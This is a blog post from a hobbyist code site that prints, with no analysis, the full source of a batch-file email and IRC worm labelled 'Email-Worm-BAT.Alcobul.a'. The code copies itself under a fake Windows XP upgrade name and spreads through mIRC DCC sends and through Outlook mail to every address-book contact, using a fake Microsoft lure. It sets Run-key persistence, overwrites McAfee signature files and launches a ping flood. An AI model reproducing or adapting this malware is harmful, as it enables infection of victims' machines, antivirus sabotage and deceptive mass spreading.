Tag Cloud

CRM 2011 (161) CRM 4.0 (144) C# (116) JScript (109) Plugin (92) Registry (90) Techpedia (77) PyS60 (68) WScript (43) Plugin Message (31) Exploit (27) ShellCode (26) FAQ (22) JavaScript (21) Killer Codes (21) Hax (18) VB 6.0 (17) Commands (16) VBScript (16) Quotes (15) Turbo C++ (13) WMI (13) Security (11) 1337 (10) Tutorials (10) Asp.Net (9) Safe Boot (9) Python (8) Interview Questions (6) video (6) Ajax (5) VC++ (5) WebService (5) Workflow (5) Bat (4) Dorks (4) Sql Server (4) Aptitude (3) Picklist (3) Tweak (3) WCF (3) regex (3) Config (2) LINQ (2) PHP (2) Shell (2) Silverlight (2) TSql (2) flowchart (2) serialize (2) ASHX (1) CRM 4.0 Videos (1) Debug (1) FetchXml (1) GAC (1) General (1) Generics (1) HttpWebRequest (1) InputParameters (1) Lookup (1) Offline Plug-ins (1) OutputParameters (1) Plug-in Constructor (1) Protocol (1) RIA (1) Sharepoint (1) Walkthrough (1) Web.config (1) design patterns (1) generic (1) iframe (1) secure config (1) unsecure config (1) url (1)

Pages

Monday, August 01, 2011

Email-Worm-BAT.Alcobul.a


@echo off
del c:\mIRC\script.ini
echo [script] > c:\mIRC\script.ini
echo n0= on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\WINDOWS\UpgradeToWindowsXP.bat } >> c:\mIRC\script.ini
cd\
md XP
copy %0.bat c:\XP
cls
attrib +h +r c:\XP
echo n1= /join #Beginner >> c:\mIRC\script.ini
if exist c:\WINDOWS\UpgradeToWindowsXP.bat goto rancid
copy %0.bat c:\WINDOWS\UpgradeToWindowsXP.bat
:rancid
if exist c:\XPUpdate.reg goto punk
echo REGEDIT4 > c:\XPUpdate.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W

indows\CurrentVersion\Run] >> c:\XPUpdate.reg
echo "PX"="c:\\XP\\xp.bat" >> c:\XPUpdate.reg
:punk
start c:\XPUpdate.reg
for %%f in (C:\progra~1\mcafee\mcafee~1\*.dat) do copy %0.bat %%f
if exist c:\X.vbs goto goldfinger
echo. on error resume next > c:\X.vbs
echo dim a,b,c,d,e >> c:\X.vbs
echo set a = Wscript.CreateObject("Wscript.Shell") >> c:\X.vbs
echo a.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XXP"
, "c:\XP\xp.bat" >> c:\X.vbs
echo set b = CreateObject("Outlook.Application") >> c:\X.vbs
echo set c = b.GetNameSpace("MAPI") >> c:\X.vbs
echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
echo set d = c.AddressLists(y) >> c:\X.vbs
echo x = 1 >> c:\X.vbs
echo set e = b.CreateItem(0) >> c:\X.vbs
echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
echo f = d.AddressEntries(x) >> c:\X.vbs
echo e.Recipients.Add f >> c:\X.vbs
echo x = x + 1 >> c:\X.vbs
echo next >> c:\X.vbs
echo e.Subject = "Upgrade to Windows XP" >> c:\X.vbs
echo e.Body = "Good news from Microsoft. Click the attachment for your FREE Windows XP. Upgrade to Windows XP now." >> c:\X.vbs
echo e.Attachments.Add ("c:\WINDOWS\UpgradeToWindowsXP.bat

") >> c:\X.vbs
echo e.DeleteAfterSubmit = False >> c:\X.vbs
echo e.Send >> c:\X.vbs
echo f = "" >> c:\X.vbs
echo next >> c:\X.vbs
echo a.run("c:\PROGRA~1\INTERN~1\iexplore.exe http://www.yahooka.com") >> c:\X.vbs
echo a.run("c:\WINDOWS\ping.exe -l 10000 -t www.hotmail.com") >> c:\X.vbs
:goldfinger
start c:\X.vbs
attrib +h +r c:\X.vbs
exit
::BatchWerm by !!-virus-!! =)

No comments: